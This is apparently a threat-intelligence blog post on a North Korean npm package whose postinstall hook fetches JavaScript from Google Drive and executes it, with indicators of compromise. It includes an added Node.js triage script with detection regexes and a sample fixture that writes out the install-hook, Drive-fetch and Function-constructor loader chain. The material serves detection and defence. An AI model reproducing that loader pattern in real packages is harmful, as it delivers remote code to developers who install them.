DPRK tests Google Drive as a malware stager

2026-02-21 Kmsec

https://kmsec.uk/blog/dprk-gdrive-stager/

FAMOUS CHOLLIMA used express-core-validator v1.0.1, published by npm user crisdev09 on 20 February 2026, to test Google Drive as a stager in its Contagious Interview npm activity. The package's postinstall chain loaded core.js, retrieved a Google Drive file by ID, and executed the downloaded JavaScript with the Function constructor. The staged file was named inject-simple.min0.js with SHA-256 2a7e7b76a3e8070410adce9b6a2b9cf112687922792c91be563c20fbf6a4a82f, and the same payload was also observed in a GitHub repository under frontend/public/images/splash.png. The shift to Google Drive is notable because the actor more commonly stages follow-on payloads on paste sites and developer platforms, so a Node.js process reaching out to a consumer storage provider during package installation is a useful hunting signal.
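To turn the install-hook behaviour described above into a triage check, here is an added example that is not part of the original post: a small Node.js helper that parses a package's package.json, follows the scripts referenced by its install hooks, and flags files that both reach Google Drive and execute fetched text as code. The package fixture is constructed to mirror the described chain; the file ID, regexes and function names are assumptions, not the actor's or npm's own code.

```javascript
// Added example, not from the original post: static triage of an unpacked
// npm package for the "install hook -> Google Drive fetch -> Function()" chain.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristics (assumed patterns) for the two behaviours the report pairs:
// fetching a Drive file by ID, and executing a string as code.
const DRIVE_FETCH = /drive\.google\.com\/uc\?[^'"`]*id=|googleapis\.com\/drive\/v\d+\/files/i;
const DYNAMIC_EXEC = /\bnew\s+Function\s*\(|\bFunction\s*\(|\beval\s*\(|\bvm\.runIn\w*Context\s*\(/;

// files: map of relative path -> file contents for the unpacked package.
// A real scan would read these from the tarball; here they are passed in.
function triagePackage(files) {
  const pkg = JSON.parse(files["package.json"]);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    // Collect the .js files the hook command references, e.g. "node core.js".
    const referenced = scripts[hook].match(/[\w./-]+\.js\b/g) || [];
    for (const rel of referenced) {
      const src = files[rel.replace(/^\.\//, "")];
      if (src === undefined) continue; // referenced file missing from package
      const fetchesDrive = DRIVE_FETCH.test(src);
      const execsDynamic = DYNAMIC_EXEC.test(src);
      findings.push({
        hook, file: rel, fetchesDrive, execsDynamic,
        // Both behaviours together in one install-time file is the signal.
        verdict: fetchesDrive && execsDynamic ? "suspicious" : "review",
      });
    }
  }
  return { name: pkg.name, version: pkg.version, findings };
}

// Constructed fixture mimicking the reported chain: postinstall -> core.js,
// which pulls a Drive file by ID and hands the body to the Function constructor.
// PLACEHOLDER_FILE_ID is not a real indicator.
const SAMPLE = {
  "package.json": JSON.stringify({
    name: "express-core-validator", version: "1.0.1",
    scripts: { postinstall: "node core.js" },
  }),
  "core.js": [
    'const id = "PLACEHOLDER_FILE_ID";',
    'fetch("https://drive.google.com/uc?export=download&id=" + id)',
    "  .then(r => r.text()).then(src => new Function(src)());",
  ].join("\n"),
};

console.log(JSON.stringify(triagePackage(SAMPLE), null, 2));
```

The same check can be run across a registry mirror or a lockfile's resolved tarballs; a "review" verdict only means an install hook exists, while "suspicious" means the hook's script shows both behaviours.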

Indicators of Compromise

Type    Value                                   First Seen    Last Seen
HASH    85c6cebb22bc2e5abc27aac9b1bbcf4…        2026-02-21    2026-02-21
HASH    addbf305fe29949810b536456987e11…        2026-02-21    2026-02-21
HASH    2a7e7b76a3e8070410adce9b6a2b9cf…        2026-02-21    2026-02-21
EMAIL   [email protected]                       2026-02-21    2026-02-21
